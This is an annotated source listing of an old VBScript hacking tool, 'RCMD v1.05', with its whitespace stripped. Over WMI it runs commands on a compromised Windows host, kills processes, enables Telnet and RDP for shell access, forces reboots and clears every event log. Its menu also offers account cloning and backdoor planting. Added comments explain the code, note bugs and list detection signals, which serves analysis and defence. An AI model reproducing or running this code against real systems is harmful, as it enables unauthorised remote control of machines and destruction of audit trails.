' run(): executes one command line on the target through Win32_Process.Create (the same primitive
' wmiexec-style tools use). The process runs in the WMI-authenticated user's context, non-
' interactively; its output is NOT returned — the console only learns the return code and PID.
' Target-side: a new process whose parent is WmiPrvSE.exe, which is the standard hunting signal.
functionrun()

strcmdline=WScript.StdIn.Readline()

' exit/quit/0 jumps to main(); if main() ever returns, execution falls through and the word
' "exit" itself is sent as a command
ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then

callmain()

endif

outstreem.write"Runningthecommand...."

setobjinstance=objswbemservices.get("win32_process")

setobjmethod=objinstance.methods_("create")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.commandline=strcmdline

setobjoutparam=objinstance.execmethod_("create",objinparam)

' Non-zero ReturnValue = creation failed; recurses into command() instead of returning
ifobjoutparam.returnvalue<>0then

wscript.echo"Error!"

callcommand()

else

wscript.echo"OK!"

endif

wscript.echo"TheProcessIDis"&objoutparam.processid

wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf

callcommand()

endfunction

'*******************************************

' pslist(): lists every Win32_Process as Name / PID (Handle) / ExecutablePath, tab-separated.
functionpslist()

outstreem.write"Listingprocess...."

setcolinstances=objswbemservices.execquery("select*fromwin32_process")

showerror(err.number)

wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"

foreachobjinstanceincolinstances

' Extra tab for short names keeps the columns roughly aligned
iflen(objinstance.name)<8then

strname=objinstance.name&chr(9)

else

strname=objinstance.name

endif

wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath

next

wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!"

callmain()

endfunction

'*****************************************

' pskill(): terminates a process on the target by PID via Win32_Process.Terminate (reason 0).
' A non-existent PID makes the Get() fail (error suppressed), leaving objinstance non-object,
' which the vartype check catches. The success message is printed after showerror() only if the
' return code was 0, since showerror() jumps to main() otherwise.
functionpskill()

wscript.echo"pleseentertheprocess'sid:"

strprocess=WScript.StdIn.Readline()

outstreem.write"Killingid="&strprocess&"process...."

' Object path built by concatenation from the operator's input
setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")

ifvartype(objinstance)<>vbobjectthen

wscript.echovbcrlf&"Specifiedprocessisnotexist."

callmain()

else

setobjmethod=objinstance.methods_("terminate")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.reason=0

setobjoutparam=objinstance.execmethod_("terminate",objinparam)

showerror(objoutparam.returnvalue)

wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!"

endif

callmain()

endfunction

'********************************************************

' telnet(): toggles the target's Telnet Server (tlntsvr). If the service is running it is
' stopped; otherwise the operator is asked for an NTLM mode and port, both are written to
' HKLM\SOFTWARE\Microsoft\TelnetServer\1.0 through StdRegProv, and the service is started. A
' disabled service is first switched to Manual. Telnet is cleartext; with NTLM=0 the password
' travels in the clear as well (as documented for the Win2000/XP telnet server — verify).
' Note: this function reconnects to "rootcimv2" (root\cimv2 with the backslash lost) and
' replaces the shared objswbemservices, so a failed reconnect breaks every later command.
functiontelnet()

outstreem.write"Queryingstateoftelnetserver...."

setobjswbemservices=objlocator.connectserver(ipaddress,"rootcimv2",username,password)

setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'")

showerror(err.number)

foreachobjinstanceincolinstances

ifobjinstance.startmode="Disabled"then

outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...."

setobjmethod=objinstance.methods_("changestartmode")

setobjinparam=objmethod.inparameters.spawninstance_()

objinparam.startmode="Manual"

setobjoutparam=objinstance.execmethod_("changestartmode",objinparam)

showerror(objoutparam.returnvalue)

endif

outstreem.write"Changeingstate...."

ifobjinstance.started=truethen

intstatus=objinstance.stopservice()

showerror(intstatus)

wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully."

else

' intstatus is unset in this branch, so this always prints "OK!"
showerror(intstatus)

wscript.echo"pleseenterthentlm:"

ntlm=WScript.StdIn.Readline()

wscript.echo"pleseentertheport:"

port=WScript.StdIn.Readline()

' Suspected defect: ReadLine returns a String, and VBScript orders any String above any Number,
' so "ntlm>2" appears to be True for every input and this check always rejects — verify. The
' intended range 0..2 also only makes sense if ntlm were converted with CInt/CLng first.
ifnotisnumeric(ntlm)orntlm<0orntlm>2then

wscript.echo"ThevalueofNTMLiswrong."

callmain()

endif

ifnotisnumeric(port)then

wscript.echo"Thevalueofportiswrong."

main()

endif

' Registry writes go through a separate connection to root\default (StdRegProv lives there)
setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)

outstreem.write"SettingNTLM="&ntlm&"...."

setobjinstance1=objswbemservices1.get("stdregprov")

setobjmethod=objinstance1.methods_("SetDWORDvalue")

setobjinparam=objmethod.inparameters.spawninstance_()

' &h80000002 = HKEY_LOCAL_MACHINE
objinparam.hdefkey=&h80000002

objinparam.ssubkeyname="SOFTWAREMicrosoftTelnetServer1.0"

objinparam.svaluename="NTLM"

objinparam.uvalue=ntlm

setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

outstreem.write"Settingport="&port&"...."

' Same in-parameter object reused; only the value name and data change
objinparam.svaluename="TelnetPort"

objinparam.uvalue=port

setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

' Return code of StartService is stored but never checked; success is announced regardless
intstatus=objinstance.startservice()

wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!"

wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell."

endif

next

callmain()

endfunction

'********************************************************

' rs(): enables Terminal Services (RDP) on a Server-edition target and moves it to a chosen port,
' purely by registry edits through StdRegProv, then offers a forced reboot. Keys touched (with the
' backslashes this listing lost): ...\CurrentVersion\netcache Enabled=0,
' Policies\Microsoft\Windows\Installer EnableAdminTSRemote=1, Control\Terminal Server TSEnabled=1,
' Services\TermDD and TermService Start=2 (automatic), WinStations\RDP-Tcp PortNumber=<port>.
' Detection: TSEnabled/Start/PortNumber changes, RDP-Tcp listening on a non-3389 port, and the
' unexplained forced reboot.
functionrs()

outstreem.write"CheckingTheOSType...."

setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem")

foreachobjinstoscaptionincolinstoscaption

' Only editions whose Caption contains "Server" are accepted (workstation SKUs of that era had
' no terminal server); callmain() is used as an early exit, which may return on an unmatched menu choice
ifinstr(objinstoscaption.caption,"Server")>0then

wscript.echo"OK!"

else

wscript.echo"OK!"

wscript.echo"OSTypeis"&objinstoscaption.caption

wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60

callmain()

endif

next

wscript.echo"pleseentertheport:"

port=WScript.StdIn.Readline()

' Suspected defect: port is a String from ReadLine and VBScript orders any String above any
' Number, so "port>65000" appears to be True for every input and the check always rejects — verify.
ifnotisnumeric(port)orport<1orport>65000then'50

wscript.echo"Thenumberofportiserror."

callmain()

endif

outstreem.write"Writingintoregistry...."

setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

HKLM=&h80000002

withobjinstreg

' Defect: the hDefKey argument is missing (leading comma), so this CreateKey fails silently and
' the following SetDWORDValue on netcache can only succeed if the key already exists
.createkey,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache"

.setdwordvalueHKLM,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache","Enabled",0'70

.createkeyHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller"

.setdwordvalueHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller","EnableAdminTSRemote",1

.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServer","TSEnabled",1

' Start=2 = automatic start for the RDP driver and service
.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermDD","Start",2

.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermService","Start",2

' ".DEFAULT\Keyboard Layout\Toggle" is an HKEY_USERS path; written under HKLM it just creates a
' stray key — looks like a hive mix-up
.setstringvalueHKLM,".DEFAULTKeyboardLayoutToggle","Hotkey","1"

' New RDP listening port (takes effect after the service restarts / the reboot below)
.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp","PortNumber",port

endwith

showerror(err.number)

wscript.echo"Now,youneedtoreboottarget!"

wscript.echo"Doyouwanttoreboottargetnow?[y/n]"

strcancel=WScript.StdIn.Readline()

' Anything other than "n" (including an empty line) triggers the forced reboot
ifstrcancel="n"then

wscript.echo"youneedtoreboottargetthen!!"

callmain()

else

callreboot()

endif

wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!"

callmain()

endFunction

'**************************************************************

' clog(): anti-forensics — calls ClearEventLog on every Win32_NTEventLogFile instance (Application,
' Security, System and any other registered log). Needs SeSecurityPrivilege for the Security log,
' which is why privilege 7 is enabled at connect time. &h20 looks like wbemFlagForwardOnly
' (verify against WbemFlagEnum). Clearing is itself loud: the log sizes drop to zero at once and,
' on Windows Vista and later, the clear is recorded (Security event 1102 / System event 104, as
' far as I recall) — so defenders should alert on those rather than expect the trail to vanish.
functionclog()

outstreem.write"Clearingalllogs...."

strwqlquery="select*fromWin32_NTEventLogFile"

setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)

foreachobjinstanceincolinstances

' Stops at the first log that refuses to clear; earlier ones are already gone
ifobjinstance.cleareventlog()<>0then

wscript.echo"Error!"'100

callmain()

endif

next

wscript.echo"OK!"

wscript.echo"AlllogshavebeenclearedSuccessfully!"

callmain()

endfunction

'***************************************************************

' showerror(errornumber): if the argument is non-zero, prints "Error 0x<hex>" plus the description
' and jumps back to the main menu (never returns to the caller); otherwise prints "OK!". Same
' quirk as showerroronly(): it formats err.number, not its argument, so a method return code
' passed in gets reported with whatever err.number currently holds.
functionshowerror(errornumber)

iferrornumberThen

wscript.echo"Error0x"&cstr(hex(err.number))&"."

iferr.description<>""then

wscript.echo"Errordescription:"&err.description&"."

endif

callmain()

else

wscript.echo"OK!"

endif

endfunction

'*****************************************************************

' usage(): banner with the author's contact details and the command-line syntax. The syntax
' itself is the security note: target, user name and password are all passed as plain arguments.
functionusage()

wscript.echostring(79,"*")

wscript.echo"RCMDv1.05"

wscript.echo"RemoteexecutionScript,by黑嘿黑"

wscript.echo"Welcometovisitewww.xyhack.91i.net"

wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com"

wscript.echo"Usage:"

wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword"

wscript.echo"Thenchosethecommand>"

wscript.echostring(79,"*")

endfunction

'**********************************************************

' main(): the interactive menu. Every command function ends by calling main() again, so the
' call stack grows by one frame per command and never unwinds until "quit". Menu labels (Chinese):
' 0 quit, 1 toggle telnet, 2 enable RDP/3389, 3 clear all logs, 4 system info, 5 process list,
' 6 kill process, 7 run command, 8 reboot, 9 list services, A shares, B clone account, C plant door.
' "肉鸡" in the labels is slang for a compromised host.
functionmain()

wscript.echo""

wscript.echo"Nowchosethecommand>"

wscript.echo"0.quit退出脚本"

wscript.echo"1.telnet远程开/关telnet"

wscript.echo"2.3389远程开3389"

wscript.echo"3.clog远程删除所有日志"

wscript.echo"4.getf获取肉鸡系统信息"

wscript.echo"5.pslist例出进程"

wscript.echo"6.pskill删除进程"

wscript.echo"7.command远程执行DOS命令"

wscript.echo"8.reboot远程重启肉鸡"

wscript.echo"9.slist例出远程肉鸡上的服务信息"

wscript.echo"A.Share1.列出共享2.创建共享3.删除共享"

wscript.echo"B.ca克隆帐号"

wscript.echo"C.Door种植后门"

wscript.echostring(79,"*")

wscript.echo"CMD>"

cmd=WScript.StdIn.Readline()

wscript.echo""

' No Case Else: an unrecognised entry returns to the caller (which then usually calls main()
' again or runs on with whatever followed its own callmain()).
SelectCasecmd

case"telnet","1"

telnet()

case"3389","2"

rs()

case"clog","3"

clog()

case"getf","4"

inf()

case"psl","pslist","5"

pslist()

case"psk","pskill","6"

pskill()

case"cmd","command","7"

command()

case"reboot","8"

reboot()

' Defect: the function is named listsvr(); "listlistsvr" does not exist, so the call fails and is
' swallowed by the script-wide On Error Resume Next — option 9 silently does nothing.
case"slist","9"

listlistsvr()

case"share","10","a","A"

share()

case"B","b","11"

ca()

case"C","c","12"

door()

case"quit","0"

wscript.quit

endselect

endfunction
